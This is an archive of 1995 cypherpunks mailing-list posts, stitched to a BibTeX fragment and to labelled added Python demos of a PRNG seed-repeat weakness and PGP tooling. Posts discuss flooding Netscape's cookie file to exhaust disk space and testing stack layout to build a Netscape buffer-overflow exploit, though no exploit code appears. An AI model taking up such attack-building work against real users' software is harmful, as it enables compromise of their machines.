        author = {Edna K. Grossman and Bryant Tuckerman},
        title = {Analysis of a Weakened {Feistel}-like Cipher},
        booktitle = {1978 International Conference on Communications},
        pages = {46.3.1--46.3.5},
        publisher = {Alger Press Limited},
        year = {1978},
        annote = {Feistel ciphers with identical subkeys in each round
                        are very weak}
}

@article{related-keys-1,
        author = {Robert Winternitz and Martin Hellman},
        title = {Chosen-key Attacks on a Block Cipher},
        journal = {Cryptologia},
        year = {1987},
        volume = {{XI}},
        number = {1},
        month = {January},
        pages = {16--20}
}

@inproceedings{related-keys-2,
        author = {Eli Biham},
        title = {New Types of Cryptanalytic Attacks Using Related Keys},
        booktitle = {Advances in Cryptology: {EUROCRYPT} '93},
        pages = {398--409},
        publisher = {Springer-Verlag},
        year = {1994}
}
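
[Added example, not part of the original message or of Netscape/RSAREF code.] The repeat described above can be reproduced with a counter-plus-MD5 generator modelled on the prng() pseudocode: when the seed bit at contrib_area is set, xoring in a contribution of 1 rewinds the counter, and the last output before the contribution comes back exactly 1 << contrib_area outputs later. The 128-bit seed, the sample seed value and the take_hashed() intake are assumptions of this sketch; take_hashed() is a commonly used alternative that the thread does not propose.

```python
import hashlib

SEED_BITS = 128  # assumed width, matching the 1 << 128 cycle length mentioned
MASK = (1 << SEED_BITS) - 1


class CounterPrng:
    """prng() from the message: increment the seed, return MD5(seed)."""

    def __init__(self, seed: int):
        self.seed = seed & MASK

    def _seed_bytes(self) -> bytes:
        return self.seed.to_bytes(SEED_BITS // 8, "big")

    def next(self) -> bytes:
        self.seed = (self.seed + 1) & MASK
        return hashlib.md5(self._seed_bytes()).digest()

    def take_xor(self, remote_contrib: int, contrib_width: int, contrib_area: int):
        """The proposed intake: xor the low bits of the contribution into the seed."""
        low = remote_contrib & ((1 << contrib_width) - 1)
        self.seed ^= (low << contrib_area) & MASK

    def take_hashed(self, remote_contrib: bytes):
        """Assumed alternative (not from the thread): seed = MD5(seed || contribution)."""
        digest = hashlib.md5(self._seed_bytes() + remote_contrib).digest()
        self.seed = int.from_bytes(digest, "big")


def outputs_until(prng: CounterPrng, target: bytes, limit: int):
    """Number of further outputs until `target` reappears, or None within limit."""
    for count in range(1, limit + 1):
        if prng.next() == target:
            return count
    return None


def scenario(bit_set: bool, intake: str, contrib_area: int = 10, warmup: int = 5):
    """Run the generator, accept the contribution ``1``, look for a repeat."""
    # Constructed seed: bits below contrib_area are zero, bit contrib_area as asked.
    base = (0x5EED << 64) | ((1 << contrib_area) if bit_set else 0)
    prng = CounterPrng(base)
    last = None
    for _ in range(warmup):
        last = prng.next()  # outputs the victim has already used
    if intake == "xor":
        prng.take_xor(1, 1, contrib_area)
    else:
        prng.take_hashed(b"\x01")
    return outputs_until(prng, last, limit=4 << contrib_area)


if __name__ == "__main__":
    print("bit set, xor intake     :", scenario(True, "xor"))
    print("bit clear, xor intake   :", scenario(False, "xor"))
    print("bit set, hashed intake  :", scenario(True, "hashed"))
```

The bit-clear case is the other half of the "probability 1/2": there the xor adds 1 << contrib_area and the counter skips ahead instead of rewinding.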



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: william@interval.net (William C. Archibald)
Date: Wed, 27 Sep 95 08:51:43 PDT
To: rfb@lehman.com
Subject: Re: [NOISE] Re: Easter Eggs
Message-ID: <9509271550.AA13262@entropy.interval.net>
MIME-Version: 1.0
Content-Type: text/plain



alano@teleport.com <Alan Olsen> ]:
>    obNetscapeHack: There is a feature called a "cookie file" in
>    Netscape that is ripe for exploitation as a security leak.  If you
>    are using a Netscape server (and you may not even need that), you
>    can feed all sorts of information into it without the user's
>    knowledge.  I have heard of one page that overloads the cookie file
>    until the machine runs out of drive space.  I am sure that there
>    are other exploitable holes there...  Any takers?
Umm. The spec says that there is a maximum cookie size and a maximum
number of cookies that should be sent. I'll be the last to claim
that Netscape created a 'standards-compliant' product, but they
have at least recognized that these things aren't supposed to be
infinitely large.

rfb@lehman.com <Rick Busdiecker> ]:
> Yikes!  That sounds really bad.  Do you have any more information on
> this?  For example, can the server write to anything other than
> $HOME/.netscape-cookies?  If I write protect that file, but it's still
> owned by me, will Netscape still modify it?
The server can't write anything. Cookies are returned as HTTP 
response headers, which will either be:
	A) Ignored by a cookie-ignorant browser, or, 
	B) Processed by a cookie-aware browser.

In either case, the cookie cache reading/writing is done by the
browser. If the browser is running as 'you' then it can access
files that 'you' own. If you write protect it against yourself, then
it's likely that your user-agent (Netscape) running as 'you' can't
write to that file.

Cheers!
w. archibald





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Wed, 27 Sep 95 08:23:32 PDT
To: eb@comsec.com
Subject: Re: The Fortezza random number generator is not trustworthy
In-Reply-To: <199509262156.OAA21527@comsec.com>
Message-ID: <9509271504.AA09830@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 26 Sep 1995 14:56:54 -0700
>From: Eric Blossom <eb@comsec.com>
>

>I was under the impression that a seed for the RNG is loaded into the
>Fortezza at initialization time.  This would make me think that they
>are using a cryptographically strong PRNG.  This would give data that
>appears random, but is completely determined by the initial state.
>
>I suspect that the "seed keys" provided by the two agencies used to
>program the Clipper chips has the same properties.  This makes the
>question about how does the NSA get access to the key escrow database
>moot.  They don't need access.  They know a priori all the unit keys.


My favorite Clipper master key generation algorithm, in the sacrificial
laptop in the Mykotronix vault, is:

	\[ K(n) = H_1(R_1, R_2, n) = H_2( n ) \]

where $H_2$ is a damned good one-way function, as highly classified as
DERD's original description of the PRNG in the chip programming process
indicated, $n$ is the chip's serial number, $R_1$ and $R_2$ are the ranno
seeds provided by NIST and Treasury folks and $K(n)$ is the master key for
chip n.


 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Wed, 27 Sep 95 08:21:38 PDT
To: cypherpunks@toad.com
Subject: [ PROPOSED NEW STANDARD ] "I-like-encrypted-mail" tag
Message-ID: <199509271521.LAA12800@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain



Summary:

	This message tosses out an idea for conveying within an { email |
	usenet } message the datum "the author of this message prefers to
	receive PGP encrypted communications" in a standard machine-readable
	form.

Motivation:

	In the most recent version of my

		<a href="http://www.openmarket.com/personal/tjic/emacs.html">
	 mail-secure.el package
		</a>

	I included a feature that allows users to maintain a list of
	correspondents who prefer to receive encrypted mail.  This list is
	then used by the package at email-send-time to see if a piece of email
	should be encrypted.

	I and others on this list include tags along the lines of "PGP
	encrypted mail preferred" in our .sigs.  It occurred to me that this
	could be automated: 

	(1) a standard "I-like-encrypted-mail" tag could be defined
	(2) cryptography-capable mail tools could scan incoming messages for
			this tag and add the originators of any message containing the
			tag to a list
	(3) cryptography-capable mail tools could then use this list when
			sending (as mail-secure.el currently does).


Possible Implementations:

	A couple of different methods occur to me to implement step #1:

	(a) a new header could be defined and added to messages (as per
	section 3 of 

		<a href="http://www.cis.ohio-state.edu/htbin/rfc/rfc1505.html">
	RFC 1505
		</a>

	), along the lines of 

		X-Rcv-Security-Prefered: PGP-Encryption

	(b) a certain keyword or phrase could be defined that could be
	inserted in the .sig block of a message.  Ex:

		--
		foo@bar.com
		PGP-Encrypted-Mail-Preferred

	I am tempted to suggest something either compatible with or in the
	spirit of 

		<a href="http://www.eit.com/creations/s-http/draft-ietf-wts-shttp-00.txt">
	SHTTP 
		</a>

	negotiation blocks, but restrain myself from doing so because this

	(a) seems needlessly baroque for the information being conveyed
	(b) falsely implies that a negotiation is taking place, when in fact a
		mere advisory is being issued.

Security concerns:

	A temporary denial-of-service/annoyance attack could be mounted by an
	adversary who issues one forged message from individual A with the
	"PGP-encrypted-mail preferred tag" present, and then puts a fake key on
	a keyserver.  Anyone who uses a tag-aware mail-reading package and
	sees this message would send future mail to individual A encrypted in
	a manner that didn't allow A to read it.


Please mail or post any thoughts on this proposal.

Thanks,

TJIC
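
Steps (1) to (3) of the proposal above and its "Security concerns" paragraph, as an added example (not part of the original post and not code from mail-secure.el). The `verified_signer` argument, the class and function names, and the sample messages are assumptions of this sketch; the header and .sig keyword are spelled as in the post.

```python
"""Scan incoming mail for the proposed "encrypted mail preferred" advisory."""
from email import message_from_string
from email.utils import parseaddr

PREF_HEADER = "X-Rcv-Security-Prefered"   # header name as spelled in the proposal
PREF_VALUE = "pgp-encryption"
SIG_TAG = "PGP-Encrypted-Mail-Preferred"  # .sig keyword from option (b)


def sender_address(msg):
    """Lower-cased address from the From: header ('' if absent)."""
    return parseaddr(msg.get("From", ""))[1].lower()


def advertises_preference(msg):
    """True if the advisory appears as a header or inside the .sig block."""
    values = [v.strip().lower() for v in msg.get_all(PREF_HEADER, [])]
    if PREF_VALUE in values:
        return True
    body = msg.get_payload()
    if not isinstance(body, str):         # multipart mail is out of scope here
        return False
    lines = body.splitlines()
    # Look only below the last signature delimiter ("--" or "-- "), so body
    # text that merely quotes the keyword does not count.
    for i in range(len(lines) - 1, -1, -1):
        if lines[i].rstrip() == "--":
            return any(line.strip() == SIG_TAG for line in lines[i + 1:])
    return False


class PreferenceList:
    """Steps (2) and (3), with a guard against forged advisories."""

    def __init__(self, require_verified=True):
        self.require_verified = require_verified
        self.encrypt_to = set()  # correspondents we will encrypt to
        self.pending = set()     # advisory seen, origin not authenticated

    def observe(self, raw, verified_signer=None):
        """Record one incoming message and say what was done with it.

        verified_signer is an assumption of this example: the address bound
        to a key already trusted locally that the caller's PGP tool verified
        the message against, or None if unsigned or unverified.
        """
        msg = message_from_string(raw)
        addr = sender_address(msg)
        if not addr or not advertises_preference(msg):
            return "ignored"
        if self.require_verified and verified_signer != addr:
            # A bare tag proves nothing about who sent it: remember it, but
            # do not change how mail to this address is sent.
            self.pending.add(addr)
            return "pending"
        self.pending.discard(addr)
        self.encrypt_to.add(addr)
        return "added"

    def should_encrypt(self, recipient):
        return recipient.lower() in self.encrypt_to


# Constructed sample messages (not taken from the list archive).
HEADER_MSG = """From: A <a@example.org>
To: list@example.org
Subject: hello
X-Rcv-Security-Prefered: PGP-Encryption

Signed mail from A.
"""

UNSIGNED_SIG_MSG = """From: A <a@example.org>
To: list@example.org
Subject: hi

Unsigned mail claiming to be from A.

--
a@example.org
PGP-Encrypted-Mail-Preferred
"""

MENTION_ONLY_MSG = """From: B <b@example.org>
To: list@example.org
Subject: Re: proposal

I think PGP-Encrypted-Mail-Preferred is too long a keyword.
PGP-Encrypted-Mail-Preferred
"""

if __name__ == "__main__":
    naive, guarded = PreferenceList(require_verified=False), PreferenceList()
    print("naive  :", naive.observe(UNSIGNED_SIG_MSG))
    print("guarded:", guarded.observe(UNSIGNED_SIG_MSG))
    print("guarded:", guarded.observe(HEADER_MSG, verified_signer="a@example.org"))
```
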




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <ploshin@tiac.net>
Date: Wed, 27 Sep 95 08:54:38 PDT
To: "'cypherpunks@toad.com>
Subject: RE: "Notes" to be Eclipsed by "Netscape"
Message-ID: <01BA8CD0.30988CA0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May[SMTP:tcmay@got.net] wrote:

>At 6:52 PM 9/25/95, Jon Lasser wrote:
>
>>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of
>>a student like myself, and probably most others, if it's still anything
>>like it was at the 1.0 release) that most people have had zero opportunity
>>to examine the program, let alone really have time to play with it?
>
>I've never even _seen_ a copy of Notes running on any machine, nor do I
>know directly of _any_ of my colleagues who has. (Not saying nobody has, of
>course, just that I can't find anyone I know well who has.)

I've used Notes myself (and have written about how it and Notes add-in apps are used).  Yes, it was overpriced, but they came out with a less-featured, less-expensive version (which I haven't seen).  Based on my experiences, it appears to be a choice for rigid/business management/TQM types in big corporations, among others.

>I've been following the news on Notes for at least several years, even to
>the point of buying some Lotus stock several years ago on the strength of
>what I had read about Notes. (Alas, I sold it soon thereafter, before a
>run-up in price.)
>
>My point? Notes is nearly invisible in the non-corporate community I now
>hang out in.

No question about that.  You need a dedicated server, server software and, at least a year ago, it all cost something like $500+ per seat to set up.  Plus, it doesn't do you any good unless you are working in a workgroup.

>Who knows what weaknesses or bugs it has in it. Folks on our list probably
>don't have much familiarity with it.

I only just subscribed to this list, and by all rights should probably spend more time lurking; that said, Notes includes encryption and digital signature.

>My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM
>overpaid for Lotus, that the notion of Notes becoming the universal
>collaboration/communication option is flawed.

There has been growing sentiment among certain sectors that workgroup computing is the wave of the future.  Unfortunately, given IBM's track record, their purchase of Lotus seems to doom it to a fate similar to OS/2: an excellent product with a track record, with a small but fervent following, which will soon be eclipsed by some less-featured, newer product that makes someone a pot of money (like CollabraShare).

Notes end users have always seemed to feel it had too much power and was not easy to figure out how to use; Notes programmers love it, and there are lots of addins.  With Notes going to IBM, Netscape seems to have made another very clever move--while it still doesn't justify the overall stock price, it does justify the rise associated with that move.

>(I've been saying for a while that the Web serves that purpose better, and
>that Web browsers will likely edge out Notes. Apparently I was hardly
>prescient, as Netscape recently bought Collabra, which is pushing that
>point exactly.)

Notes uses replication to distribute data across networks; there are better ways to have people compute remotely in my opinion too (not sure WWW is THE answer, but it certainly is one of them).

>--Tim May

-Pete Loshin
 peter@world.std.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 27 Sep 95 08:55:24 PDT
To: dmandl@panix.com
Subject: Re: PGP and FBI?
In-Reply-To: <Pine.SUN.3.91.950927101916.10713A-100000@panix.com>
Message-ID: <199509271555.LAA14563@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 27 Sep 1995, Deranged Mutant wrote:
> 
> > There's some sort of documentary on WBAI 99.5 FM out of NYC now.
> > They're talking about PGP and right wing militias... the guy being
> > interviewed called PGP a "one time pad system" and doesn't understand
> > it... *sigh*
> 
> Any more details on this?  I know people who do shows on BAI.  What
> was the date/time of the show?  If this is true, it's pretty sad,
> especially since BAI's well known for being a "political" station.

I forget the name of the show, it was on Tues. night (last night) after
Pacifica (around midnight)... I wrote and sent the message while I was
hearing it.  I stopped after bleating out the message and listened to
some of the show, which was about right wing militias, Weaver case, Okla bomb,
etc... turns out I missed the short part where the person being interviewed
(duh, should've written his name down) mentioned PGP, which he also said
stood for "Pretty Good Program".  Wish I had more details of the show...

(BTW, I'm temporarily off the c'punks list)

Rob

> 
>    --Dave.
> 
> --
> Dave Mandl
> dmandl@panix.com
> http://wfmu.org/~davem
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Wed, 27 Sep 95 09:16:36 PDT
To: cypherpunks@toad.com
Subject: Re: getting netscape to support the remailers
In-Reply-To: <9509261951.AA01873@ch1d157nwk>
Message-ID: <199509271614.MAA07080@mobster.cit.ge.com>
MIME-Version: 1.0
Content-Type: text/plain


andrew_loewenstern@il.us.swissbank.com said:
> Netscape doesn't need to support remailers explicitly since Netscape 
> will be   supporting Java.  I think a remailer client is within 
> Java's capabilities...    Anyone disagree? 

Depends on how Netscape implements Java. Under HotJava it could conceivably be 
done, although Security setting may restrict the browser from doing SMTP...

Actually, I would suspect it might be possible to do using forms, using a 
mailto: form.  Hmmmmmmmm.......

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Wed, 27 Sep 95 09:29:01 PDT
To: cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <199509271628.MAA12868@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Wed Sep 27 12:28:47 1995

>  Date: Tue, 19 Sep 1995 10:57:32 -0700
>  To: cypherpunks@toad.com
>  From: tcmay@got.net (Timothy C. May)
>  Subject: Mini-mailbombs and Warning Letters
>  
>  I've received a couple of "automatically generated" pieces of
>  e-mail which tell me that, in the generator's opinion, something is
>  wrong with my public key, or it could not be found at the keyserver
>
>  As the saying goes, "Sigh."
>  
>  Being on a list with 700 subscribers, some of whom are running
>  increasingly sophisticated automatic checking agents, I foresee an
>  increase in these "warning letters" from their checking agents who
>  feel posts are not adequate in some way.

As the author of the package in question, I would like to point out:

(1) the email msg Tim refers to (hereafter referred to by me as "query-mail") 
		was a request for information, not a warning

(2) the query-mail did not refer to any inadequacy in the original
		posting.  It explicitly refers to the fact that the original poster
		PGP signed a message, but did not make the public key to verify the
		message easily available.

(3) the query-mail was sent to an actual person only after several
		non-intrusive methods had failed.

(4) checking right now, I find that the finger command does indeed
		fail to get a public key from Tim's address.

(5) checking right now, I find that BAL's keyserver does indeed fail
		to give any key with the address "tcmay@got.net"

(6) the query-mail is not a purely robotic spam: there is a human in the loop

(7) the keyserver used by query-mail generator defaults, not to some
		arbitrary preference, but to BAL's keyserver, which is the most used
		server that I know of, and which (to the best of my knowledge)
		receives regular updates from several other keyservers.

(8) given that "increasingly sophisticated automatic checking agents"
		can make it much easier for individuals to gather keys, check
		incoming messages, and sign or encrypt outgoing messages, it
		seems that such "agents" tend to increase the usage and
		acceptance of cryptography, which is a good thing for all
		concerned.


A question: in a situation like this one, where an individual signed a
message with a key then did not make a key with the return address of
his message available either through his .plan, or a keyserver (the two
de facto standards), what next step -if any- do people think is more
appropriate than sending mail to the individual asking them for a copy
of the key ?

>  I'm dealing with it the same way I'm dealing with the few people
>  who have something in their MIME setup that triggers my mailer
>  (Eudora Pro 2.1) to treat their text as attachments. Namely, by
>  filtering them out.

This is a fine anarchistic solution to the problem (and that's a
compliment!), from your point of view (although, I hasten to point
out, not quite as good as submitting a key with a valid address on it
to a keyserver).  If anyone else wishes to ignore requests for keys,
the subject string to add to your email kill-file is

		"please send me your PGP public key"


Because I do think that automating parts of the
encryption/signing/verification/decryption/key-retrieval process will
make cryptography more wide-spread (in so far as there is not a
backlash against this automation), I do not want to ignore the
concerns of others.

So...how would people do things differently if they were writing this
sort of software?  One idea proposed by Jiri Baum
<jirib@cs.monash.edu.au> is to find the key ID used to sign the
message, and then query the keyserver with this ID, as opposed to an
email string.  I'm not sure whether or not I like this idea (for
security reasons), but that question is moot, as it seems to be
impossible given the current keyservers.

Any other suggestions or ideas?

- -- 
TJIC (Travis J.I. Corcoran)       http://www.openmarket.com/personal/tjic/

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	 PGP encrypted mail preferred.   Ask me about mail-secure.el for emacs.



-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: auto-signed by mail-secure.el v 0.998 using mailcrypt.el
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMGl7wIJYfGX+MQb5AQErpQP/XvoJ0QF4TEtPhJuxk5ifsUlXrl4RSvyP
dFh1MkTQWl4/D+jFHI0MW+gyi2/EmzxEW+8zYUCLENBIq8H3QJgQDnQ9NRM3JiGU
c9yd4EeE9bH8r+KppF5WfJfuE4hJ6YFRO0sdal0oJs3RfuF2ZIHoLoKPR5G97EGv
dmWg2J784ZM=
=xnv7
-----END PGP SIGNATURE-----
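
The key-ID lookup idea discussed in the message above needs the signer's key ID, which sits unencrypted in the signature packet. The following is an added example (not part of the original post, and not code from mail-secure.el or PGP) that reads it from the signature block of that message; the function names are assumptions of this sketch, and the armor checksum line is skipped rather than verified.

```python
"""Read the signer's key ID from an ASCII-armored PGP 2.x (version 3) signature."""
import base64
import struct
from datetime import datetime, timezone

# Signature block copied from the message above.
ARMORED = """-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: auto-signed by mail-secure.el v 0.998 using mailcrypt.el
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMGl7wIJYfGX+MQb5AQErpQP/XvoJ0QF4TEtPhJuxk5ifsUlXrl4RSvyP
dFh1MkTQWl4/D+jFHI0MW+gyi2/EmzxEW+8zYUCLENBIq8H3QJgQDnQ9NRM3JiGU
c9yd4EeE9bH8r+KppF5WfJfuE4hJ6YFRO0sdal0oJs3RfuF2ZIHoLoKPR5G97EGv
dmWg2J784ZM=
=xnv7
-----END PGP SIGNATURE-----
"""


def dearmor(text):
    """Return the binary packet bytes inside an ASCII-armored block."""
    lines = [line.strip() for line in text.strip().splitlines()]
    if not (lines[0].startswith("-----BEGIN PGP")
            and lines[-1].startswith("-----END PGP")):
        raise ValueError("not an armored PGP block")
    inner = lines[1:-1]
    if "" not in inner:
        raise ValueError("missing blank line after armor headers")
    # Armor headers end at the first blank line; the line starting with "="
    # is the CRC-24 checksum, which this sketch does not verify.
    data = [l for l in inner[inner.index("") + 1:] if l and not l.startswith("=")]
    return base64.b64decode("".join(data), validate=True)


def parse_v3_signature(packet):
    """Parse an old-format signature packet and return its cleartext fields."""
    ctb = packet[0]
    if ctb & 0xC0 != 0x80:
        raise ValueError("not an old-format packet header")
    if (ctb >> 2) & 0x0F != 2:
        raise ValueError("not a signature packet")
    length_type = ctb & 0x03
    if length_type == 3:
        raise ValueError("indeterminate-length packets are not handled")
    width = 1 << length_type                      # 1, 2 or 4 length octets
    length = int.from_bytes(packet[1:1 + width], "big")
    body = packet[1 + width:1 + width + length]
    if len(body) != length or length < 21:
        raise ValueError("truncated signature packet")
    version, hashed_len, sig_type, created = struct.unpack(">BBBI", body[:7])
    if version not in (2, 3) or hashed_len != 5:
        raise ValueError("not a version 2/3 signature")
    key_id = body[7:15]                           # low 64 bits of the RSA modulus
    return {
        "packet_length": length,
        "sig_type": sig_type,                     # 1 = canonical text document
        "created": created,
        "created_utc": datetime.fromtimestamp(created, timezone.utc).isoformat(),
        "key_id": key_id.hex().upper(),
        "short_id": key_id[4:].hex().upper(),     # 32-bit form shown in key listings
        "pk_algo": body[15],                      # 1 = RSA
        "hash_algo": body[16],                    # 1 = MD5
        "mpi_bits": int.from_bytes(body[19:21], "big"),
    }


def signer_hint(armored):
    """Key ID to look up. It is an unauthenticated hint: any key fetched by ID
    must still verify the signature and be checked by fingerprint."""
    return parse_v3_signature(dearmor(armored))["key_id"]


if __name__ == "__main__":
    for field, value in parse_v3_signature(dearmor(ARMORED)).items():
        print(f"{field:14} {value}")
```

The creation time in the packet agrees, to within a second, with the `Message-Signature-Date` line in the signed text once the four-hour offset from UTC is applied.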




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 27 Sep 95 09:46:25 PDT
To: "Jeff Weinstein" <jsw@netscape.com>
Subject: It's Wednesday
Message-ID: <199509271646.MAA06516@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Do you know where your new Netscape is?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Wed, 27 Sep 95 10:15:37 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: PGP and FBI?
In-Reply-To: <199509270409.AAA00688@libws4.ic.sunysb.edu>
Message-ID: <Pine.A32.3.91.950927131445.25408G-100000@MACAW.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 27 Sep 1995, Deranged Mutant wrote:

> 
> There's some sort of documentary on WBAI 99.5 FM out of NYC now.
> They're talking about PGP and right wing militias... the guy being
> interviewed called PGP a "one time pad system" and doesn't understand
> it... *sigh*

Well there really is no reason that you can't use PGP as a hash function 
or its random function to produce OTP's.

Ben.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMGmGpL5ALmeTVXAJAQGJ0AL/dCS9dbl5NBHohG6VrUgU2CdBP99AsYvD
7TN0hV8pJrsgsy1OyuCHAlP5rFBlUHiTsWUJfYKAhaRSgF4MLMfEpgKbc58BNkhh
vXq3qfeIt/cRgiMbpuWpbtO9GyPzRSgR
=vB06
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: donlonm@ccmail.mcclellan.af.mil
Date: Wed, 27 Sep 95 10:23:54 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil>
MIME-Version: 1.0
Content-Type: text/plain


Ray,

You wrote:

>I've found a Netscape bug which I suspect is a buffer overflow and 
>may have the potential for serious damage. If it is an overflow bug, 
>then it may be possible to infect every computer which accesses a web 
>page with Netscape. 

Is there any way to avoid/prevent this problem by changing options in 
NetScape?

Thanks,

Mike D.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Wed, 27 Sep 95 05:28:04 PDT
To: ecm@ai.mit.edu
Subject: NO weak links in DigiCash system!!!
Message-ID: <199509271227.NAA14451@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


> I have a couple of problems/complaints with your ecash project.
> When I was sent my Acct ID and Passwd they were sent to me plain text
> instead of being PGP-encrypted first.  This means that some malicious
> hacker could have intercepted the e-mail message and stolen the
> free cyber-bucks you were so generous as to give me.  Second, on the
> WWW-page where one downloads the software it does not seem to do a secure
> connection between my browser and your server (on netscape there is
> a small key in the lower-left hand corner that is supposed to show when
> one is securely connected to a secure server).  So someone could sniff my
> password from the transaction when I GET the software.  Also When I'm
> buying/selling things it would be smart for all parties involved to
> be using PGP, and I think you should stress this point more in your page.
> Otherwise this is another vulnerable point in your system IMHO.

Let's get this straight before spreading more of these vicious 
rumours that can easily get misinterpreted.

DigiCash is an R&D company developing ecash. We license out our 
technology to banks. We are running the trial, but only have limited 
resources to do so. This may result in long waiting time for accounts 
or no answer on a tech support mail. (We are of course trying to 
prevent this).
In a real-money system, the password can of course not be sent out in 
plain mail. Either it has to be transferred out-of-band (phone, 
paper) or PGP'd. But that would require at least ten people answering 
the phones, sending snailmail, etc. We do not have the resources to 
do so, so we send out the password plain. A malicious hacker may 
snatch the password and open the account for you and steal your 
cb$100. This, however, is not related to the security of the 
transactions once you open the account! The password is only for 
starting up the account.
And of course downloading on a secure server is not relevant. The 
software is the same for everyone! It is just not put out for public 
downloading because it would mean a hundred times more people asking 
for tech support. It would be more secure if we used different 
passwords for downloading and for opening the accounts but again, 
that would give a LOT more problems.
PGP does not add any security in the payment system. Ecash is already 
secure.

Feel free to ask us the questions before publicly posting. It will 
prevent misunderstandings and libel lawsuits.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 27 Sep 95 13:54:53 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: WSJ on Netscape Hole 3
Message-ID: <v02120d06ac8f74e7796e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Somebody wrote:
>> With Netscape 1.1 the state of the stack is much more dynamic, in
>> particular the user can be viewing documents at an arbitrary depth in
>> the "web tree", each recursion will increase the stack pointer (or
>> decrease with some architectures) There is no way of knowing for
>> certain where your code will end up and thus no way to reliably alter
>> the return address on the stack to execute your arbitrary code.
>

I just tested this under Solaris 2.4 and it "turns out not to be
the case." I approached my "bad" URL from a variety of other places,
passing through various other pages, and the stack structure was
still the same when I clicked on the bad guy. The big problem I'm
having on this platform is the windowing register system on the SPARC
architecture, which interacts in weird ways with the debugger.

The lack of determinacy about where the stack is loaded in global
memory _does_ seem to be a much bigger problem on the Mac, which
is still not anything approaching a multi-tasking OS. Under Unix,
processes get their own address space to play in, which is always
the same; on Macs, with their weird relocatable heaps, you never
know where stuff is going to get loaded.

I wonder how this is handled in Windows 95....

As for objections about how worthwhile this is, it's pretty clear
that a patch will be available for this problem before we can finish
and publicize an exploit. This is not, however, the last piece of
network software that will contain problems of this sort, and it is
a good idea to build up expertise in this area. I'd also suggest going
after some of the other browsers... I know, for instance, that AOL's
browser dies horribly on these same sort of URLs.

Good luck, all.

Doug






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 27 Sep 95 14:04:54 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Easter Eggs
Message-ID: <199509272104.OAA16793@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:35 AM 9/27/95 -0400, you wrote:
>    Date: Tue, 26 Sep 1995 12:59:54 -0700
>    From: Alan Olsen <alano@teleport.com>
>    
>    You also need X windows to find the Mozilla animated icon hack on
>    Jammie Zawinski's page.
>    ^^^^^^
>
>Just for the record, that's Jamie.

Hey!  I never said I could type at 1am!  Yes, I know.  #%#$#%ing spelling
flames.  Grumble. Grumble. (BTW, the compass egg will show up in any page
with /jwz/ in the url.  The "anim" tag on his page is bogus.)

>    obNetscapeHack: There is a feature called a "cookie file" in
>    Netscape that is ripe for exploitation as a security leak.  If you
>    are using a Netscape server (and you may not even need that), you
>    can feed all sorts of information into it without the user's
>    knowledge.  I have heard of one page that overloads the cookie file
>    until the machine runs out of drive space.  I am sure that there
>    are other exploitable holes there...  Any takers?
>
>Yikes!  That sounds really bad.  Do you have any more information on
